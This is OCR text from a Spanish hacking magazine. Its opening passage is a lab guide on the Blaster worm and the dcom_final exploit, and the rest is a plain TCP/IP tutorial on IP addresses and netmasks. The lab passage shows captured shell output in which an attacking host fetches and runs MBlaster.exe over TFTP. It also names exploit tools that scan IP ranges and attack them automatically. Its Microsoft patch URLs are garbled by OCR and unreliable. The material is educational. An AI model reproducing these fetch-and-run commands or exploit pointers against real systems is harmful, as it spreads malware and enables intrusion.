Con esto quiero que llegues a la conclusión de que si 
sabemos por qué puerto consigue la shell de system32... 
¿Qué pasaría, si dejaras un netcat a la escucha por ese 
puerto (4444), en nuestra máquina, ahora la máquina 
víctima?... 


Para dejar el netcat a la escucha solo tienes que poner 
estos parámetros: 


nc -vv —-L -p 4444 (y te quedara algo como esto) 


D:WWINDOWS1System32lcmd.exe - nc -vv -| -p 4444 - (0 xj 


¡Gi>cd nc 


IG3NNC>nc —vv —L —p 4444 
listening on [any] 4444 .. 
AS 


IG3NNC>nc —vv -1 —p 4444 
listening on [any] 4444 ... 


Ahora que tenemos el nectcat a la escucha, imagínate que 
nuestro sistema es vulnerable y que va ser atacado por 
MBlaster... 


Muchos usuarios de Internet piensan que el Blaster es el 
“virus” que provoca que se reinicie el PC (en otras palabras, 
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Para poder realizar las prácticas en varios PCs solo tienes 
que determinar cual es la máquina víctima y cual la máquina 
atacante, después solo tienes que: 
> poner en la máquina víctima un netcat a la escucha 
en el puerto 4444 (más arriba tienes los parámetros 
para dejar netcat a la escucha) 
> en la máquina atacante tienes que lanzar el exploit 
contra la máquina víctima como te hemos explicado en 
el punto 3 de las prácticas: “Aprendiendo a utilizar el 
dcom_ final”. 


En el caso de tener solo un PC, tendrás que dejar un netcat 
a la escucha como ya te hemos explicado, y lanzar el exploit 
contra tu mismo PC, lo resultados serán los mismos. 


A 
Dominios sin letra pequeña 


Esto es lo que aparecería en la shell donde tenemos el 
netcat a la escucha (host Víctima) 


vu —1 —p 4444 
on [any] 4444 ... 
[192 


B.11 from HACK [192.168.0.21 1057 
tftp. =50, 1 M.2 GET MBlaster.exe 
istart MBlaster.exe 


Voy a comentar algo sobre esto. Si te fijas en la shell de 
la máquina víctima, aparecen parámetros ya explicados 
en el punto 4 de las prácticas: “¿Cómo se copia el 
Blaster desde un PC a otro PC? ¿Cómo es posible...”. 
Y, a parte, aparece algo de información sobre el host 
atacante. 


Esto quiere decir que todo lo que escriba el host 


atacante será visualizado por nosotros gracias a netcat 
(y por supuesto no será ejecutado en nuestra máquina). 


> ] 


Tu propio dominio por sólo 18,95 € por un año”, 


con todo incluido: 


- IVA incluido 


.COm - Panel de control 
.net * Redirección a tu página WEB con META-TAGS 
.0rg * Redirección de email 


info * Gestión completa de DNS: 
biz apunta a la IP de tu conexión 
? * Bloqueo antirrobo 
* Sin letra pequeña: 18.95 IVA Incl (16.34 + IVA 16%). Precio para 


un año de registro extensiones .com, .net, .org, .info, .biz . 
Precios menores contratando varios años. 


domiteca 
www.domiteca.com 


Precios especiales para distribuidores; consúltanos. 
DOMITECAO es un servicio ofrecido por HOSTALIA INTERNET S.L. 
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Pero esto aun tiene algo más de gracia, porque si te fijas 
aparecen dos IPs, una es la IP del atacante, en mi caso, 
[192.168.0.2], y otra es la IP del Servidor TFTP que aloja 
la copia del virus Blaster (msblast.exe). En nuestro caso 
las dos IPs son iguales, pero esto no tiene porque ser así... 
el archivo msblast.exe podría estar ubicado en un PC 
controlado por el propio programador del virus (por ejemplo). 


Pero aun no se acaba aquí la gracia, porque si te fijas, TÚ 
también puedes escribir en la shell donde hemos dejado 
netcat a la escucha. Lo que escribas será también visualizado 
por el atacante (máquina que lanza el exploit)... ¿Te imaginas 
la cara del atacante cuando vea algo como esto, en la shell 
de netcat que ha lanzado contra nuestro PC? 


M oft Windows XP [Vers 5.1.26001 
<C)> Copyright 1985-2081 Microsoft Corp. 


CzNDocuments and SettingsWNeTTinG>cd C:MWINXP <E>NNc 


Hola 
¿Es tuya esta IP 192.168.8.2? 


¿Y la ÍP de este servidor, 192.168.8.2? 


Se quedara más que flipado, pensara que somos nosotros 
quienes lo habemos hackeado. 

Y lo mejor de todo es que podrás hablar con tu atacante 
;p, todo esto con solo una línea con netcat... 


7.- Esquivando al Blaster o al dcom_final... 
Parcheando el PC. 


Las actualizaciones publicadas por Microsoft para evitar 
este problema pueden descargarse desde: 

Windows NT 4.0 Server 

Ip Inirosoficanidmdoak dais? Farid dd 2CC6ÓFAE2TEAEA7 BDBEDETTAOBO3BF£depla area 


Windows NT 4.0 Terminal Server Edition 
Iapo/hmicrosoficamidnrdoadkitacisaga? Farid =6COPOLÓO ALA ACASCICIFADODC6SCARdiplalre—en 


Windows 2000 

Hip hnicrosoficonidnoahdealsaga? FanibdifOSBSASACESHACISSCIEZIBARON E dla dane=en 
Windows XP 32 bit Edition 

Tp ricrosficomidrioad deasasa? Famild=2354406CCSB6HACIS323DEAOFO9OO74Sdiglaire=en 


Windows XP 64 bit Edition 
Hp nicrosoficoamiimtoces acia? FamibldE1BO0FSDFAAESASSE-SOES OSA 7ADOCADE | Kilo danezen 


Windows Server 2003 32 bit Edition 
Tapohmixosoficamtrioadaakaga? Fambdd=FSEOFEZAFICAOSLI03A2IASSEDESdipla dang=en 
Windows Server 2003 64 bit Edition 
Tapo/hmisrosoficomtinrioadaakaga? Fambid=2B566973.CSFOAECIIIEO7ESSORBCIEdipla dare=an 


8.- Para los más juguetones: 


Si queréis más sobre este tema, buscar sobre el exploit 
“oc192-dcom.exe” (este exploit tiene la facultad de que 
no provoca D.O.S a la máquina víctima). 
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Y si sois de los perezosos, buscar el scanner-exploit “kaht2" 
(este escaneara rangos de IPs buscando IPs vulnerables) 
y, si las encuentra, mandara automáticamente el exploit 
para conseguir la shell de system)... 


¡ii ¿Alguien da más? ! ! ! 
9.- Recomendaciones: 


Antes de ponerte a “jugar” con los exploits, te aconsejo, 


mejor dicho, "te obligo” * a que practiques antes con tu 
ordenador. 


En la gran red, Internet, encontraras multitud de diablillos 
como los aquí explicados, pero el funcionamiento siempre 
es Casi el mismo... 


Te recomiendo también que te pases por páginas como 
hispasec, donde te informan muy rápidamente de las 
últimas novedades sobre la seguridad informática. 


Y si no entiendes algo sobre algún tema, pásate por los 
foros de hackxcrack (www.hackxcrack.com), te quedaras 
sorprendido de la gran cantidad de información, más que 
interesante, que allí se recopila, a parte de las grandes 
respuestas que responderán a tus preguntas o cuestiones. 


Así que no lo dudes, si aun no eres miembro de los foros 
de hackxcrack, no esperes un minuto más para registrarte... 
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Este mes vamos a descubrir qué es realmente una If. qué es una Dirección de Red. qué son 


y cómo funcionan las Máscaras de Red. cómo un paquete es encaminado en una red, cómo 


se reparten el pastel de los rangos de IPs los ISPs y muchas cosas mas. 


INTRODUCCIÓN 


Este mes empezamos con uno de los 
puntos más interesantes: la capa de 
red, es decir, la capa IP, que es una de 
las que dan su nombre a toda la pila de 
protocolos que componen el llamado 
TCP/IP. 


Mucho hay que decir sobre esta capa, 
quizá la más importante, por lo que de 
momento esta primera entrega la 
dedicaré únicamente a presentar algunos 
de los conceptos relacionados con ella, 
concretamente todo lo referente a las 
direcciones TP. 


Mucho se ha mencionado a estos 
“numerajos” en la revista, pero pocas 
veces se ha entrado en detalle sobre lo 
que realmente son y cómo funcionan. 


A lo largo de este artículo veremos en 
detalle en qué consiste una dirección 
de red, cómo funcionan las máscaras, 
el encaminamiento en una red 
TCP/IP como Internet, las clases de 
redes, las direcciones reservadas, las 
redes locales, las direcciones 
broadcast, e introduciremos otros 
protocolos relacionados, como son el 
DHCP o el ARP. 


Dejo ya para otro artículo la explicación 
de la cabecera IP, así como el 
funcionamiento detallado del protocolo. 
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Si todo sigue el rumbo que espero, una 
vez que termine la parte “básica” del 
curso de TCP/IP lo completaré con un 
artículo dedicado al protocolo IPv6. Este 
es una nueva versión del protocolo IP, 
aún no extendida mundialmente, que es 
el futuro para una Internet que está 
llegando actualmente al límite de sus 
posibilidades técnicas. 


Una vez más tengo que insistir en que 
mi forma de explicar las cosas no es la 
“clásica”, ya que pienso que es absurdo 
repetir una vez más aquello que está 
explicado de la misma forma en mil sitios 
diferentes. Por tanto, aprovechando que 
esta revista se llama PC PASO A PASO, 
mi forma de explicar las cosas será muy 
lenta, pero segura, no mostrando las 
cosas sin más, si no llegando a ellas desde 
el fondo de los conceptos básicos. 


Así, ruego un poco de paciencia a aquellos 
que digan “¿pero cómo puede estar 
explicando lo que es una máscara de red 
en 20 páginas, si en cualquier sitio está 
explicado en sólo una página?”, 


Mi intención es que este curso no sea un 
curso más de TCP/IP, si no un curso 
diferente, una alternativa para aquellos 
que están cansados de encontrar una y 
otra vez la misma forma de contar las 
cosas (muchas veces imposible de 
entender por lo críptico del lenguaje 
utilizado)... y una y otra vez muchas 
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personas dejan de estudiar estos temas 
porque no llegan a entender lo que leen... 
vamos a ver si conseguimos arrojar un 
poco de luz!!! 


1. LA FUNCIÓN DE LAS 


DIRECCIONES IP 


El concepto fundamental de lo que es 
una dirección IP ya lo he repetido en 
varias Ocasiones, pero es tan importante 
que ha de ser repetido una y otra vez, 
sobre todo para aquellos nuevos lectores 
que se incorporan ahora al curso de 
TCP/IP (aunque a estos nuevos lectores 
les advierto que van a tener muy 
complicado poder seguir el curso a partir 
de este punto sin haberlo pillado desde 
el principio). 


Este curso... 


Este curso es de los más veteranos de la revista PC PASO 
A PASO. Se empezó con la serie de artículos RAW (donde 
se trataron en profundidad los protocolos más importantes) 


y se siguió con las serie TCP/IP (donde "asaltamos el 


corazón" de las comunicaciones por red). 


Aunque intentamos que cada artículo sea comprensible "en 


sí mismo", llega un momento en que es muy difícil asumir 


el contenido de los mismos sin haber estudiado las anteriores 


entregas de la serie. Te recomendamos que pidas las revistas 


anteriores a un amigo o las encargues en 


www.hackxcrack.com. 
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La función de una dirección IP es la 
misma que la de un número de teléfono, 
O la de una dirección postal: identificar 
unívocamente a uno de los 
participantes en una red de 
comunicación. 


En cualquier entorno en el que haya más 
de dos elementos, y se desee establecer 


una comunicación entre sólo dos de ellos, 
será imprescindible asignar a cada uno 
una dirección única que permita 
identificarles unívocamente. 


Así, la red telefónica tiene millones de 
abonados, pero cada uno de ellos tiene 
un número de teléfono siempre 
diferente a los demás. 


Lo mismo ocurre con la red de correo 
postal, en la que cada persona tiene una 
dirección única. 


En la red postal, la combinación de la 
dirección de destino de la carta o paquete 
(lugar donde debe llegar el paquete), y 
el remite del mismo (lugar de donde se 
envía el paquete), definen claramente los 
dos elementos de la comunicación. Lo 
mismo ocurre en la red telefónica, con la 
combinación de los dos números de 
teléfono (al que llamas, y desde el que 
llamas). 


Internet es una red formada por millones 
de ordenadores de todo el mundo pero, 
a diferencia de lo que puede parecer, las 
comunicaciones son siempre entre sólo 
dos ordenadores. 


Cuando entramos en un chat en el que 
hay 30 usuarios (o 50, o 200), en realidad 
todo funciona gracias a varios pares de 
conexiones entre los diferentes usuarios 
y un servidor central. Lo mismo ocurre 
cuando estamos jugando a un juego ON 
LINE en el que haya varios jugadores 
simultáneamente, o en cualquier otro 
entorno en el que parezca que hay muchos 
ordenadores conectados entre sí al mismo 
tiempo. Así que repito: en Internet (y, 
en general, en cualquier red TCP/IP) 
jamás se conectan directamente 
entre sí más de dos máquinas. 
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En la imagen vemos el ejemplo de un 
chat entre 4 personas, el cual funciona 
gracias a pares de conexiones entre cada 
usuario y el servidor central. Observamos 
también una quinta conexión, entre dos 
usuarios, que podría ser la transferencia 
de un archivo (por ejemplo, un DCC en 
una red de IRC). 


Por tanto, es fundamental que cada uno 
de los usuarios del chat conozca la 
dirección IP del servidor de chat. Una 
vez que ellos se conecten al servidor de 
chat, éste conocerá también la dirección 
de ellos, igual que cuando recibimos una 
llamada de teléfono podemos ver el 
número desde el cual nos están llamando. 


Si bien en el teléfono no es imprescindible 
conocer el número del que nos llama, en 
el caso de TCP/IP no sería posible la 
comunicación si las dos partes no conocen 
perfectamente la dirección IP de su 
interlocutor. 


Para el caso de la transferencia del archivo 
que vemos en la imagen, sería necesario 
que uno de los dos usuarios conociese 
la dirección IP del otro para poder 
conectarse a él. Para esto, lo que hace 
es pedir esta dirección IP a través del 
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servidor de chat, que es el único que 
conoce las direcciones IP de todos los 
usuarios del chat. 


¿Cómo sabe el servidor cuál es la IP del 
usuario que se acaba de conectar? Pues 
sencillamente mirando la cabecera IP 
del paquete de inicio de conexión del 
usuario, ya que en todas las cabeceras IP 
están siempre especificadas las direcciones 
IP de origen y destino del paquete, tal y 
como veremos en el próximo artículo, en 
el que detallaremos el formato de la 
cabecera IP. 


Los que no hayáis seguido todos mis 
artículos probablemente os estaréis 
preguntando ahora por qué he dicho que 
los usuarios del chat tienen que conocer 
la dirección IP del servidor para poder 
conectarse, ya que probablemente muchos 
de vosotros habréis entrado en una red 
de IRC (o cualquier otro Chat) y jamás 
habéis tenido que aprenderos ningún 
número raro para poder conectar. Gracias 
a Dios (o más bien al IETF *), los seres 
humanos no tenemos que tratar 
(normalmente) con todos esos numerajos 
difíciles de recordar, si no que podemos 
utilizar unos nombres equivalentes mucho 
más intuitivos, como: 


www.google.com, irc.efnet.nl, etc., etc. 


Esto se consigue gracias a un sistema 
llamado DNS que permite asociar un 
nombre “más humano” a cada dirección 
IP. De esta forma, cada vez que queremos 
acceder a una máquina nos basta con 
conocer su nombre, y no los números 
que forman su dirección IP. 


Cuando solicitamos una conexión con una 
máquina a partir de su nombre, nuestro 
ordenador (sin que nosotros nos 
enteremos), primero tendrá que traducir 
el nombre de la máquina para obtener la 
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dirección IP asociada, lo cual hará 
mediante una serie de consultas a unos 
servidores especiales que “conocen” las 
direcciones IP asociadas a cada nombre. 


Una vez que ya tiene la dirección IP, se 
conectará a esa máquina sin que nosotros 
nos hayamos enterado del proceso. Desde 
nuestro punto de vista parece como si 
directamente pudiésemos conectarnos 
conociendo sólo el nombre, y no los 
numerajos. 


Todo el sistema DNS lo expliqué con todo 
detalle en la serie RAW de esta revista, 
hace ya varios meses, por lo que espero 
que el artículo esté liberado para que lo 
podáis bajar y comprender cómo funciona 
realmente todo esto. + 


Ahora posiblemente os estaréis haciendo 
otra pregunta: ¿de dónde salen las 
direcciones 1P? 


Está claro de donde salen los números 
de teléfono: es Telefónica la que asigna 
un número diferente a cada abonado. 
También está claro de donde salen las 
direcciones postales: Correos asigna un 
código postal a cada zona y el resto de 
la dirección postal depende de la calle y 
piso y puerta en el que viva cada usuario 
(el nombre de la calle lo pone el 
ayuntamiento y el piso y la puerta el 
constructor de la vivienda). 


En el caso de las direcciones IP, también 
tiene que haber algún organismo 
regulador que evite que dos máquinas 
tengan la misma dirección IP en una 
misma red. Este organismo es InterNIC, 
que se encarga de asignar unos rangos 
de direcciones IP a cada organización. 
InterNIC delega en cada organización 
para que asignen cada IP específica a 
cada máquina dentro de ese rango. 


Ponemos un caso real y lo entenderemos 
rápidamente: 


CASO REAL TELEFÓNICA: 

> Un buen día, Telefónica decide ofrecer 
a sus usuarios conexión a Internet y 
para ello necesita “un montón” de 
direcciones IP. Pues eso, llama a 
InterNIC y le dice que le pase "un 
montón” de IPs. 

b InterNIC, una vez estudiada la 
petición, le asigna a Telefónica un 
generoso rango de direcciones. 
> Telefónica YA TIENE IPs!!! Ahora 
pone a sus genios de publicidad a 
trabajar y nos machaca con sus 
anuncios en todos los medios de 
comunicación... contrata tu acceso a 
Internet con Telefónica y bla, bla, bla. 
Por cierto, uno de sus anuncios era 
muy interesante... ¿recuerdas el del 
mono?... en ese nos insultaba a todos 
los usuarios de Internet españoles 
comparándonos con un mono... Ca 
tragar y a Callar”) 

b Cuando Tú (o Yo) llamamos a 
telefónica y contratamos el acceso a 
Internet, NO ES INTERNIC quien te 
asignará una IP, será TELEFÓNICA 
quien te asigne la IP. Por supuesto, 
TELEFÓNICA te dará una de las IPs 
que previamente INTERNIC le ha 
asignado a ella. 


Telefónica puede hacer con sus IPs LO 
QUE QUIERA!!! Desde dártela a ti (su 
nuevo cliente) hasta ceder (alquilar) a 
terceras compañías parte del rango que 


previamente le confió INTERNIC. 


Esta libertad para que el ISP "de turno” 
haga lo que quiera con su rango de IPs 
es lo que da lugar a la existencia de 
direcciones IP dinámicas. Nuestro ISP 
(proveedor de servicios de Internet, como 
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Desgraciadamente... 


Desgraciadamente, cuando decimos que el ISP puede hacer 


"lo que quiera" con sus IPs, incluimos desagradables 
sorpresas: 
> Hay ISPs que únicamente te ofrecen IPs Dinámicas. 
Esto provoca que no puedas tener ciertos servicios en 
tu PC (por ejemplo un servidor FTP) sin utilizar algún 
tipo de re-direccionamiento automático por nombre (en 
anteriores números de la revista ya explicamos como 
hacer esto con todo detalle). 
> Hay ISPs que únicamente de dan una IP FIJA si la 
pides expresamente, pero sorpresa!!! Te cobrarán entre 
6 y 24 euros al mes por tan "preciada" posesión. 


2. LAS DIRECCIONES IP TAL 
Y COMO SON 


Hasta ahora he estado hablando de unos 
“numerajos” asumiendo que todos habéis 
visto alguna vez una dirección IP, y espero 
que así sea. Para los nuevos (nuevísimos) 
de la clase os muestro aquí el aspecto 
de una dirección IP tal y como las solemos 
conocer: 


192.168.2.15 


Como vemos, es un número compuesto 
de 4 números separados por puntos. 
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Estos puntos lo que hacen en realidad es 
separar las cifras del número. ¿Cifras? 
¡Pero si la primera cifra es 192! Yo pensé 
que una cifra iba sólo desde O hasta 9... 


Pues esto es así en la base que estamos 
acostumbrados a utilizar: la base 10, o 
base decimal. En base decimal tenemos 
las cifras 0, 1, 2,3, 4,5,6,7,8,009. 
Pero pueden existir muchas bases 
diferentes, por ejemplo: 


b la base 2, O base binaria 
(únicamente hay 2 cifras): las cifras 
son sólo O, o 1. 

> la base 16, o base hexadecimal 
(hay 16 cifras): hay más cifras que 
en la base 10, siendo éstas O, 1, 2, 3, 
4,5,6,7,8,9,A,B,C,D,E, y F 


Fíjate que como... 


Fíjate que como se nos han acabado las cifras de la base 
decimal, para llegar a 16 cifras se utilizan letras. Los que 
se "inventaron" el sistema hexadecimal podrían haber 
utilizado cualquier otro símbolo para sus cifras, por ejemplo 
letras griegas o "dibujitos" egipcios. 


Como vemos, la base 10 tiene 10 cifras 
diferentes, la base 2 tiene 2 cifras 
diferentes, y la base 16 tiene 16 cifras 
diferentes. Por tanto, la base 256 
tendrá... 256 cifras diferentes. Cada una 
de estas cifras estaría comprendida entre 
O y 255 (1, 2, 3, 4... 58, 59... 102, 103... 
198, 199... 253, 254 y 255). 


Una dirección IP no es más que un 
número de 4 cifras en base 256. Por 
tanto, la primera cifra del número del 
ejemplo será 192, la segunda 168, la 
tercera 2, y la última será 15 ------ > 
192.168.2.15 
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¿Y por qué se utiliza esta base tan 
rara cuando estamos acostumbrados 
a utilizar la base decimal de toda la 
vida? Pues porque, aunque las 
personas estemos acostumbrados a 
la base decimal, ésta no es muy 
apropiada para las máquinas, que son 
las que realmente tienen que lidiar con 
las direcciones IP. Concretamente, a 
las máquinas sólo les gusta la base 2 
(binaria), y sus derivadas. 


Una base muy íntimamente ligada a la 
base 2 es la base 256, que es la que 
da lugar a la existencia de los famosos 
bytes, u octetos. Por tanto, cada una de 
las cifras de una dirección IP corresponde 
a un byte, por lo que cada dirección IP 
tiene un tamaño de 4 bytes. Un byte 
es, en cierto modo, el tamaño elemental 
de información que puede manejar una 
máquina (esto no es del todo así, pero 
es para que nos entendamos). Si no te 
ha quedado claro sigue leyendo Y 


Como he dicho, las máquinas sólo 
entienden el lenguaje binario, pero esa 
IP que os he mostrado (192.168.2.15) 
está en realidad representada de forma 
que sea fácilmente comprensible para un 
humano (con cada cifra expresada en el 
clásico formato decimal). ¿Cuál es 
entonces el auténtico aspecto de una 
dirección IP? Pues es, por supuesto, 
una fantástica ristra de ceros y unos, de 
esas que aparecen en las "pelis de 


hackers”. Y 


Veamos por ejemplo el auténtico aspecto 
de la dirección del ejemplo: 


11000000 . 10101000 . 00000010 . 00001111 


Como vemos, Cada cifra en base 256 
está formada de 8 cifras binarias (cero 
o uno), por lo que una dirección IP 
consta de un total de 32 cifras 
binarias (bits). 


Para lo que voy a explicar a continuación 
es imprescindible que conozcáis la forma 
de convertir una IP en su formato clásico 
(192.168.2.15) a su formato “real”, con 
todas las cifras binarias. Así que ruego 
un poco de paciencia a los que estáis ya 
un poco hartos de mi insistencia con el 
tema de la aritmética binaria, porque voy 
a explicar de nuevo cómo convertir 
números de decimal a binario, aunque en 
esta ocasión no voy a explicar el método 
“matemático”, si no el sistema que utilizo 
yo para poder hacerlo de cabeza, sin 
necesidad de lápiz y papel + 


La gran ventaja de esta forma de cambiar 
de base decimal a binaria es que no es 
necesario realizar ninguna división, ni 
ninguno de los engorros que expliqué en 
aquel otro artículo. 


En cambio, la “desventaja” es que es 
necesario estar bastante familiarizado con 
la aritmética binaria, hasta el punto de 
que hay que conocer de memoria todas 
las potencias de 2, con exponentes de O 
a 8. 


Quizá esto os suene a una especie de 
locura propia de un friki que sólo sale de 
su Casa para comprar más memoria RAM 
o más cafeína, pero en realidad aprenderse 
estos números es mucho más fácil de lo 
que parece, ya que estos números nos 
rodean a diario sin que nos demos cuenta. 
Las 9 primeras potencias de 2 son estas: 


20 
21 =2 
2? = 
23 = 
21 = 16 
2% = 32 
20 = 64 
2? = 128 
2” = 256 
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¿A que os suenan todos esos números? 
Los veréis cada vez que veáis cualquier 
cosa relacionada con la informática (la 
velocidad del ADSL, la capacidad de las 
tarjetas de memoria, etc, etc). 


Lo que yo hago para convertir un byte 
en su formato decimal al formato binario 
es: (mientras lees los pasos fíjate en la 
imagen) 


PUNTO 1.- En primer lugar, miramos 
entre qué dos potencias de 2 está 
comprendido. Por ejemplo, para el 
caso del número 192, está 
comprendido entre 128 y 256. Por 
tanto, la cifra binaria correspondiente 
a 128 (2?) tiene que estar a uno. 


PUNTO 2.- Para ver qué más cifras 
están a uno, cojo el 192 y le resto 
128, y nos da como resultado 64. 


PUNTO 3.- Repetimos el proceso del 
punto 1 con este nuevo número, el 
64: miramos entre qué dos potencias 
está comprendido el 64 y vemos que 
está entre 64 y 128. Por tanto la cifra 
2”, correspondiente al 64, tendrá que 
estar también a uno. 


PUNTO 4.- Igual que en el PUNTO 2: 
ahora 64 - 64 = 0, significa que 
tenemos ya el número exacto, y no 
hay que continuar el proceso. 


Por tanto, como hemos visto que hay 
que “marcar” a uno las cifras 7 y 6, 
contando 8 cifras empezando por la 
derecha, y 
siendo la 
primera la 
cifra O, 
obtenemos la 
imágen: 
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Para el caso de 168 hacemos lo mismo: 
168 está entre 128, y 256, por lo que 
marcamos la cifra 7; 168 - 128 = 40, 
que está entre 32 y 64, por lo que 
marcamos la cifra 5, correspondiente al 
32; 40 - 32 = 8 que está entre 8 y 16, 
por lo que marcamos la cifra 3, 
correspondiente al 8, y tenemos ya el 
número completo, pues 8 - 8 = 0. Nos 
queda 10101000 


Para el número 2: 2 está entre 2 y 4, 
por lo que directamente marcamos la 
cifra 1, correspondiente a 21 y2-2= 
0, por lo que ya tenemos el número, que 
será una ristra de 7 ceros y un solo uno, 
en la segunda posición empezando por 
la derecha. Nos queda 00000010 


Para el número 15: vemos que está entre 
8 y 16, por lo que marcamos la cifra 3; 
a continuación hacemos 15 - 8 = 7, que 
está entre 4 y 8, por lo que marcamos la 
cifra 2, correspondiente al 4; a 
continuación hacemos 7 - 4 = 3, que 
está entre 2 y 4, por lo que marcamos la 
cifra 1; por último, hacemos 3 - 2 = 1, 
que está entre 1 y 2, por lo que marcamos 
la cifra O, y tenemos ya el número 
completo, que será 00001111. 


Por lo tanto la IP en binario es: 
11000000 . 10101000 . 00000010 . 00001111 


3. LAS DIRECCIONES DE RED 


En muchos casos la dirección IP por si 
sola no es suficiente para todas las 
necesidades de una comunicación TCP/TP. 
Para entenderlo haremos el paralelismo 
con algo que todos conocemos: un número 
de teléfono. 
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Un número de teléfono consta de uno o 
varios prefijos, seguido del número ya 
propiamente dicho. La red telefónica 
utiliza estos prefijos para saber cómo 
dirigir el tráfico de la red entre las distintas 
zonas. 


Podríamos también hacer el paralelismo 
con el correo postal. El correo postal 
consta de un código postal (que podría 
ser considerado como un prefijo), y el 
resto de la dirección. 


Como en los dos casos anteriores, 
también las direcciones IP tienen en cierto 
modo “prefijos” que permiten diferenciar 
diferentes “zonas” entre los diferentes 
usuarios de la red. 


En el caso del correo postal, la parte de 
“prefijo” que permite separar las “zonas” 
está claramente diferenciado del resto 
de la dirección (no hay forma de confundir 
el código postal con el nombre de la 
Calle). 


En cambio, en el caso del teléfono ya es 
otro asunto. Por ejemplo, el prefijo para 
Madrid es el 91, mientras que el prefijo 
para Murcia es el 968, por lo que a priori 
no hay forma de saber hasta dónde llega 
el prefijo, ya que unos tienen 2 cifras, y 
otros tienen 3. 


Hasta hace unos años, el prefijo no se 
marcaba cuando se estaba dentro de una 
misma provincia. Por tanto, si te decían: 
vivo en Madrid y mi teléfono es el 
915758976, no sabías si, estando en 
Madrid, tenías que marcar 5758976, o 
758976, a no ser que supieses que el 
prefijo de Madrid es el 91, por lo que 
sólo habría que prescindir de las dos 
primeras cifras. 


Actualmente, esto de los prefijos es ya 
transparente al usuario del teléfono 
(siempre que llamamos a alguien 
marcamos prefijo y número, todo junto). 
---los “prefijos” de las direcciones IP 
también son transparentes para los 
usuarios de Internet--- 


En cambio, las máquinas de la red 
telefónica encargadas de conmutar los 
circuitos para comunicar a los dos 
abonados en una llamada sí que necesitan 
diferenciar los prefijos, para así saber por 
dónde ir dirigiendo la llamada para crear 
un enlace entre los dos puntos. Del mismo 
modo, las máquinas encargadas de 
direccionar el tráfico en una red TCP/IP 
(como Internet) necesitan conocer los 
“prefijos” de las direcciones IP para 
conseguir establecer un camino entre las 
dos máquinas que quieren comunicarse. 


Estas máquinas encargadas de direccionar 
el tráfico TCP/IP suelen ser los 


denominados gateways o, por usar un 


término más familiar, los routers. 


Por tanto, para conectar mediante TCP/IP 
con una máquina, no nos basta con saber 
su dirección IP, si no que también tenemos 
que conocer qué porción de ésta IP es 
prefijo, y cuál no. Al igual que en los 
números de teléfono, los prefijos de las 
direcciones IP son de longitud variable, 
por lo que es imposible saber a priori qué 
parte de la IP es prefijo, y qué parte es 
la dirección propiamente dicha de nuestra 
máquina. Esto da lugar a la necesidad de 
que una dirección IP tenga que ir 
acompañada de otro número que indique 
simplemente cuál es la longitud del prefijo 
dentro de esa IP. 


En el caso de los números de teléfono 
podríamos representar esto de la siguiente 
forma: 915758976 / 2. La última cifra, 
detrás de la barra / nos indicaría la 
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longitud del prefijo. Por tanto, sabemos 
que este número sería 5758976, y las 
dos primeras cifras, el 91, serían el 
prefijo. 


Esta misma representación se utiliza con 
las direcciones IP, pero contando el 
número de cifras binarias (bits). Por 
ejemplo, la IP 192.168.2.15 / 24, 
estaría compuesta por un prefijo de 24 
bits (24 cifras binarias), y el resto sería 
la dirección IP de la máquina, es decir, 
ésta constaría de 8 bits (ya que el total 
de bits en una dirección IP hemos dicho 
que es 32). 


Viendo la IP en su formato binario: 


11000000 . 10101000. 00000010 . 00001111 


Sabemos ya que las primeras 24 cifras: 
11000000 10101000 00000010, 
componen el prefijo (llamado dirección 
de red, como veremos más adelante). 


Sabemos también que las últimas 8: 
00001111 componen la dirección de 
la máquina (llamada dirección de host) 
dentro de la “zona” marcada por el prefijo. 


Todo esto de las “zonas” y los “prefijos” tiene relación con lo que 


expliqué sobre cómo InterNIC asigna las direcciones IP. 


La parte de prefijo sería aquella que asigna éste organismo a cada 
organización (Telefónica, gobierno de los Estados Unidos, 
Universidad Politécnica de Madrid, Microsoft, ...), y el resto de la 
dirección IP sería el rango de direcciones en las que tiene libertad 
la organización para asignarlas como quiera a sus usuarios. 


Por tanto el prefijo determinará la organización a la que está asignada 


esa IP, y el resto de la dirección determinará a una máquina concreta 
dentro de esa organización. 
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Hemos visto una forma de representar la 
longitud del “prefijo” de la dirección 
IP, que consiste en acompañar a la 
dirección de una barra separadora y un 
número que representa el número de bits 
que ocupa este prefijo. Esta forma se 
suele utilizar bastante, pero también se 
utiliza otra representación, quizá más 
conocida, que veremos ahora mismo. 


En cualquier caso, se use la representación 
que se use, a este número que especifica 
el tamaño del “prefijo” se le llama 
máscara de red. Y esto que hasta ahora 
hemos estado llamando prefijo es lo que 
en realidad se denomina dirección de 
red. Fíjate en la imagen para que no te 
pierdas y a partir de ahora, mientras lees, 
consulta continuamente la imagen. 


IMAGEN EXPLICATIVA: 


Tenemos la « y la máscara de red 24. 


><---MASCARA DE RED: 24----> 


19 . 168 . 2 o 124 


dirección de red 
(“prefijo”) 


dirección del host 
(dirección de la máquina) 


máscara de red 
(indica la longitud/tamaño 
de la dirección de red) 


La dirección de red se obtiene mediante la combinación de la y la máscara de red 


** Como una dirección de red se obtiene 
combinando la : 2 y la máscara de red, 


números: la « > + la máscara de red 
(192.168.2.15 /24). 


Lo que hasta ahora hemos estado 
llamando “zona” es lo que en realidad 
deberíamos llamar red. Cada red tiene 
una dirección de red al igual que cada 
calle de tu ciudad tiene un nombre. 


Por tanto, Internet está dividida en varias 
redes (zonas), cada una de las cuales 
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Dirección IP 


tiene asociada una dirección de red (un 
prefijo), cuya longitud viene determinada 
por la máscara de red. 


Antes dijimos que había otra forma (quizá 
más conocida) de representar la máscara 
de red. Vamos a ver ahora cuál es “esa 
otra forma” y, para el que piense que 
con aprenderse una es suficiente, ya 
puede ir cambiando de opinión... las dos 
son ampliamente utilizadas en libros 
técnicos, textos, etc. 


Lo que en realidad nos está diciendo la 
máscara de red es qué bits de nuestra 
dirección IP pertenecen a la red (o 
“zona”), y qué bits pertenecen a la 
máquina concreta dentro de esa red. 
Por tanto, la dirección de red 
192.168.2.15/24 podríamos 
representarla también así: 


= 11000000 . 10101000 . 00000010 . 00001111 


Máscara de red = 11111111.11111111.11111111.00000000 
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Para representar en binario la Máscara 
de Red (/24) lo que hacemos es poner 
tantos unos como nos indica la notación 
(/24) y el resto lo completamos con ceros. 
Los bits que estén a 1 en la máscara 
de red son los bits que pertenecen 
al prefijo. 


Si convertimos esta máscara de red de 
binario a la clásica representación decimal 
que utilizamos para las direcciones IP, 
nos quedaría la siguiente dirección de 
red (como ya sabemos, 11111111 en 
binario corresponde a 255 en decimal y 
00000000 en binario corresponde a O en 
decimal): 


